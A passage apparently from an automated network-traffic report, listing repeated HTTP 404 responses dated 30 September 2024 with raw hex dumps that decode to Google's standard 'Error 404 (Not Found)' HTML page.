64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:52 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:54 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:55 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:56 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:57 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:59 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 